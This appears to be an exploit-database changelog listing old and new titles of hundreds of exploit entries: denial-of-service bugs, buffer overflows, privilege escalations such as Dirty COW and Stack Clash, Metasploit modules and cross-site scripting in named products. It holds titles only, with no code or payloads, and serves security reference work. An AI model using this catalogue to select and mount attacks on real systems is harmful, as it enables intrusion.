DB: 2017-10-11

4 new exploits

Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service
Hasbani-WindWeb/2.0 - GET Remote Denial of Service

KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC)
KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)

Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities
Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities
WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service
Konqueror 3.5.9 - (load) Remote Crash
WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
Konqueror 3.5.9 - 'load' Remote Crash

Nokia Mini Map Browser - (array sort) Silent Crash
Nokia Mini Map Browser - 'Array Sort' Silent Crash

vBulletin Cyb - Advanced Forum Statistics - 'misc.php' Denial of Service
vBulletin Cyb - Advanced Forum Statistics 'misc.php' Denial of Service

VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)
VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)

HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution
HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe execvp_nc' Remote Code Execution

RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC)
RarCrack 0.2 - 'Filename init() .bss' (PoC)

VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption
VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption

PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service
PHP 'Exif' Extension - 'exif_read_data()' Remote Denial of Service

GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption
GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption

PyPAM - Python bindings for PAM - Double-Free Corruption
PyPAM Python bindings for PAM - Double-Free Corruption

Tiny Server 1.1.9 - HTTP HEAD Denial of Service
Tiny Server 1.1.9 - HEAD Denial of Service

Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC)
Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC)

MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service
MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service

FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)
FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)

Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow
Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow
MyServer 0.4.3 - HTTP GET Argument Buffer Overflow
MyServer 0.5 - HTTP GET Argument Buffer Overflow
MyServer 0.4.3 - GET Argument Buffer Overflow
MyServer 0.5 - GET Argument Buffer Overflow

Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service
Cisco Aironet AP1x00 - GET Denial of Service

McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement
McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement
Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (1)
Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (2)
Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (3)
Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)
Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)
Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)

Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service)
Gattaca Server 2003 - 'web.tmpl Language' Parameter CPU Consumption (Denial of Service)

Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service
Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service

PHPMailer 1.7 - 'Data()' Function Remote Denial of Service
PHPMailer 1.7 - 'Data()' Remote Denial of Service

Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow
Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow

MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities
MailEnable 2.x - SMTP NTLM Authentication Multiple Vulnerabilities

Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service
Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service

MW6 Technologies Aztec - ActiveX 'Data Pparameter Buffer Overflow
MW6 Technologies Aztec - ActiveX 'Data' Parameter Buffer Overflow

Multiple BSD Distributions - 'strfmon()' Function Integer Overflow
Multiple BSD Distributions - 'strfmon()' Integer Overflow
HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method
HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow
HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method
HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow

Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service
Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service

KDE Konqueror 3.5.9 - JavaScript 'load' Function Denial of Service
KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service

GNU glibc 2.x - 'strfmon()' Function Integer Overflow
GNU glibc 2.x - 'strfmon()' Integer Overflow

Sun Java System Web Server 6.1/7.0 - HTTP 'TRACE' Heap Buffer Overflow
Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow

PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot
PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot

Microsoft Windows XP/Vista - '.ani' 'tagBITMAPINFOHEADER' Denial of Service
Microsoft Windows XP/Vista - '.ani tagBITMAPINFOHEADER' Denial of Service

PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service
PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service
PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service
PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service
PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service
PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service
PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service
Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service
PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service
PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service
PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service
PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service
PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service
Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service
Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)

CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service
CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table
Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table
Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table
Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table

Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table
Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to Malformed CFF Table

Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access
Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access

BT Home Hub - 'uuid' field Buffer Overflow
BT Home Hub - 'uuid' Buffer Overflow

Squid - 'httpMakeVaryMark()' Function Remote Denial of Service
Squid - 'httpMakeVaryMark()' Remote Denial of Service

Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read
Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read

Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)
Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) Pool Buffer Overflow (MS15-117)

Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame
Broadcom Wi-Fi SoC - Heap Overflow 'wlc_tdls_cal_mic_chk' Due to Large RSN IE in TDLS Setup Confirm Frame

Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)

IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)

ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit
ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit

CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation
CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

SGI IRIX 6.5.28 - (runpriv) Design Error
SGI IRIX 6.5.28 - 'runpriv' Design Error

PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution
PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution

PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit
PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit
FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition
FreeBSD 7.2 VFS/devfs - Race Condition
FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition
FreeBSD 7.2 - VFS/devfs Race Condition

Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking
Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking

Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC)
Oracle 10/11g - 'exp.exe file' Parameter Local Buffer Overflow (PoC)

Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit)
Microsoft Visio - 'VISIODWG.dll .DXF' File Handling (MS10-028) (Metasploit)

ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)
ACDSee FotoSlate - '.PLP' File 'id' Parameter Overflow (Metasploit)

Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions

PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow
PLIB 1.8.5 - 'ssg/ssgParser.cxx' Buffer Overflow

Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation
Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation

Microsoft ListBox/ComboBox Control - 'User32.dll' Function Buffer Overrun
Microsoft ListBox/ComboBox Control - 'User32.dll' Buffer Overrun

PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass
PHP 4.x/5.0/5.1 - 'mb_send_mail()' Parameter Restriction Bypass

Microsoft Windows - 'ndproxy.sys' - Privilege Escalation (Metasploit)
Microsoft Windows - 'ndproxy.sys'  Privilege Escalation (Metasploit)

Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation
Microsoft Windows - 'SeImpersonatePrivilege' Privilege Escalation

Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)

Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure
Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure

MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)
MASM321 11 Quick Editor '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)

CompuSource Systems - Real Time Home Banking - Privilege Escalation
CompuSource Systems Real Time Home Banking - Privilege Escalation

Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (SUID Method)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)

Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation
Linux Kernel - 'offset2lib' 'Stack Clash' Exploit
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation
OpenBSD - 'at Stack Clash' Local Privilege Escalation
Linux Kernel - 'offset2lib Stack Clash' Exploit
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation

Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)
Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)

Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow
Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)
Xine-Lib 1.1 - (media player library) Remote Format String
CA iTechnology iGateway - (debug mode) Remote Buffer Overflow
Xine-Lib 1.1 - 'Media Player Library' Remote Format String
CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow

Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)
Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python)

Microsoft Windows - DNS RPC - Remote Buffer Overflow (2)
Microsoft Windows - DNS RPC Remote Buffer Overflow (2)
3proxy 0.5.3g (Linux) - 'proxy.c' 'logurl()' Remote Buffer Overflow
3proxy 0.5.3g (Windows x86) - 'proxy.c' 'logurl()' Remote Buffer Overflow
3proxy 0.5.3g - (exec-shield) 'proxy.c' 'logurl()' Remote Overflow
3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow
3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow
3proxy 0.5.3g - (exec-shield) 'proxy.c logurl()' Remote Overflow

NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()/ Insecure Method
NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method

CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method
CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method

GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow
GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow
GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow
Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method
GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow
Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method

Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution
Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution

WebKit - 'Document()' Function Remote Information Disclosure
WebKit - 'Document()' Remote Information Disclosure

Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution
Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution

Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow
Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow

Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow
Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow

Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass

httpdx - 'tolog()' Function Format String (Metasploit) (1)
httpdx - 'tolog()' Format String (Metasploit) (1)

httpdx - 'tolog()' Function Format String (Metasploit) (2)
httpdx - 'tolog()' Format String (Metasploit) (2)

httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit)
httpdx - 'h_handlepeer()' Buffer Overflow (Metasploit)

hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)
hplip - 'hpssd.py' From Address Arbitrary Command Execution (Metasploit)

Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)
Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)
HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit)
HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit)
HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit)
HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit)

HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe main' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe Hostname' CGI Buffer Overflow (Metasploit)

ZyWALL USG - Appliance - Multiple Vulnerabilities
ZyWALL USG Appliance - Multiple Vulnerabilities

ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)
ScriptFTP 3.3 - LIST Remote Buffer Overflow (Metasploit) (2)

Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)
Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)

Adobe Flash Player - '.mp4' 'cprt' Overflow (Metasploit)
Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit)

UoW Pine 4.0.4/4.10/4.21 - 'From:' Field Buffer Overflow
UoW Pine 4.0.4/4.10/4.21 - 'From:' Buffer Overflow

Technote 2000/2001 - 'board' Function File Disclosure
Technote 2000/2001 - 'board' File Disclosure

IPSwitch IMail 6.x/7.0/7.1 - Web Messaging HTTP Get Buffer Overflow
IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow

Novell NetWare 5.1/6.0 - HTTP Post Arbitrary Perl Code Execution
Novell NetWare 5.1/6.0 - POST Arbitrary Perl Code Execution

Webmin 0.x - 'RPC' Function Privilege Escalation
Webmin 0.x - 'RPC' Privilege Escalation

Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit)
Avaya IP Office Customer Call Reporter - 'ImageUpload.ashx' Remote Command Execution (Metasploit)

ghttpd 1.4.x - 'Log()' Function Buffer Overflow
ghttpd 1.4.x - 'Log()' Buffer Overflow
M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting
M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting
M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Cross-Site Scripting
M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Cross-Site Scripting

Dune 0.6.7 - HTTP Get Remote Buffer Overrun
Dune 0.6.7 - GET Remote Buffer Overrun

InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit)
InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)

GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow
GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow

Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities
Rlpr 2.0 - 'msg()' Multiple Vulnerabilities

Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept' 'p_t02' Parameter Cross-Site Scripting
Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept p_t02' Parameter Cross-Site Scripting
SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure
SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion
SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect
SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp fullName' Parameter Arbitrary File Disclosure
SAP Business Connector 4.6/4.7 - 'deleteSingle fullName' Parameter Arbitrary File Deletion
SAP Business Connector 4.6/4.7 - 'adapter-index.dsp url' Parameter Arbitrary Site Redirect
PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass
PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit
PHP 4.x - 'tempnam() open_basedir' Restriction Bypass
PHP 4.x - 'copy() Safe_Mode' Bypass Exploit

Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak
Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak

aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing
aBitWhizzy - 'whizzypic.php d' ParameterTraversal Arbitrary Directory Listing

PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow
PHP 5.1.6 - 'Chunk_Split()' Integer Overflow

PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow
PHP 5.1.6 - 'Imap_Mail_Compose()' Buffer Overflow

Cisco IOS 12.3 - LPD Remote Buffer Overflow
Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow

Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow
Ghostscript 8.0.1/8.15 - 'zseticcspace()' Buffer Overflow

HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow
HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow
F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting
F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting
F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php css_exceptions' Parameter Cross-Site Scripting
F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php sql_matchscope' Parameter Cross-Site Scripting

Audio File Library 0.2.6 - libaudiofile 'msadpcm.c' '.WAV' File Processing Buffer Overflow
Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow

ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
ProFTPd 1.3 - 'mod_sql Username' SQL Injection

Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution
Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution

PHP 5.3.x - 'mb_strcut()' Function Information Disclosure
PHP 5.3.x - 'mb_strcut()' Information Disclosure

Perl 5.x - 'lc()' and 'uc()' functions TAINT Mode Protection Security Bypass
Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf jdeowpBackButtonProtect' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService e1.namespace' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService e1.namespace' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService RENDER_MAFLET' Parameter Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget' Parameter Cross-Site Scripting

NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow
NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflow

Skype 5.3 - 'Mobile Phone' Field HTML Injection
Skype 5.3 - 'Mobile Phone' HTML Injection

IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow
IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Remote Stack Buffer Overflow
GoAhead Web Server 2.18 - 'addgroup.asp' 'group' Parameter Cross-Site Scripting
GoAhead Web Server 2.18 - 'addlimit.asp' 'url' Parameter Cross-Site Scripting
